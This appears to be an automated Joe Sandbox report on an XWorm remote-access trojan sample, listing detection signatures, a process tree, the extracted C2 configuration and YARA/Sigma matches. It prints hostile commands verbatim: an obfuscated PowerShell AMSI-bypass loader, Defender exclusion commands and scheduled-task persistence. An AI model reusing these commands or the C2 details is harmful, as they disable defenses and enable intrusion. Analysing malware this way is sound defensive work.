Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mIURiU8n2P.exe

Overview

General Information

Sample name:mIURiU8n2P.exe
renamed because original name is a hash value
Original sample name:bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40.exe
Analysis ID:1532627
MD5:e1c82191b678cea8f3c996887ddc1232
SHA1:7946006ca278892817b7a778eea1e04f5b2f948c
SHA256:bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mIURiU8n2P.exe (PID: 2076 cmdline: "C:\Users\user\Desktop\mIURiU8n2P.exe" MD5: E1C82191B678CEA8F3C996887DDC1232)
    • DeadXClient.exe (PID: 5324 cmdline: "C:\Users\Public\DeadXClient.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
      • schtasks.exe (PID: 7244 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DeadROOTkit.exe (PID: 5804 cmdline: "C:\Users\Public\DeadROOTkit.exe" MD5: 7DD98FC2976EE270A278E1A9A28EEFAE)
      • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Deadsvchost.exe (PID: 8132 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
    • DeadCodeRootKit.exe (PID: 3444 cmdline: "C:\Users\Public\DeadCodeRootKit.exe" MD5: B8479A23C22CF6FC456E197939284069)
  • powershell.exe (PID: 5480 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$zjaDRBJuPBhArz=$RJkdRlkUxkpOh.GetMethod('G'+'e'+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SsrFUvzfWALaJuFfDwp=bubCglTffNzZ @([String])([IntPtr]);$tNZWRoZhdGxbOGCpZBOKKk=bubCglTffNzZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kXUOjVwsnVT=$RJkdRlkUxkpOh.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+'u'+'l'+[Char](101)+''+'H'+'a'+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+''+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LadMSRasXMAaNc=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object](''+[Char](76)+'oa'+'d'+'L'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$SNikSVGRGIadTTQBM=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object]('V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$HSvqCok=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+'r')));$DTvdUDKKbk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,4,[ref]$DTvdUDKKbk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BNdTdCEoXMsXuDwEG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,0x20,[ref]$DTvdUDKKbk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 6968 cmdline: C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
  • Deadsvchost.exe (PID: 7452 cmdline: C:\Users\Public\Deadsvchost.exe MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • Deadsvchost.exe (PID: 7700 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["subscribe-bond.gl.at.ply.gg"], "Port": "28600", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\DeadXClient.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\Public\DeadXClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7532:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x75cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x76e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x736e:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\DeadROOTkit.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\DeadROOTkit.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\DeadROOTkit.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 7 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x7332:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x73cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x74e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x716e:$cnc4: POST / HTTP/1.1
              00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x2642a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x264c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x265dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x26266:$cnc4: POST / HTTP/1.1
                00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 11 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  2.0.DeadROOTkit.exe.1a0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    2.0.DeadROOTkit.exe.1a0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      2.0.DeadROOTkit.exe.1a0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        2.0.DeadROOTkit.exe.1a0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0x888a:$s6: VirtualBox
                        • 0x87e8:$s8: Win32_ComputerSystem
                        • 0x91f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x9293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x93a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0x8d52:$cnc4: POST / HTTP/1.1
                        0.2.mIURiU8n2P.exe.27c5330.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          Click to see the 8 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\DeadXClient.exe" , CommandLine: "C:\Users\Public\DeadXClient.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\DeadXClient.exe, NewProcessName: C:\Users\Public\DeadXClient.exe, OriginalFileName: C:\Users\Public\DeadXClient.exe, ParentCommandLine: "C:\Users\user\Desktop\mIURiU8n2P.exe", ParentImage: C:\Users\user\Desktop\mIURiU8n2P.exe, ParentProcessId: 2076, ParentProcessName: mIURiU8n2P.exe, ProcessCommandLine: "C:\Users\Public\DeadXClient.exe" , ProcessId: 5324, ProcessName: DeadXClient.exe
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 5324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
                          Sigma detected: Parent in Public Folder Suspicious Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Sigma detected: Potential PowerShell Command Line Obfuscation
                          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''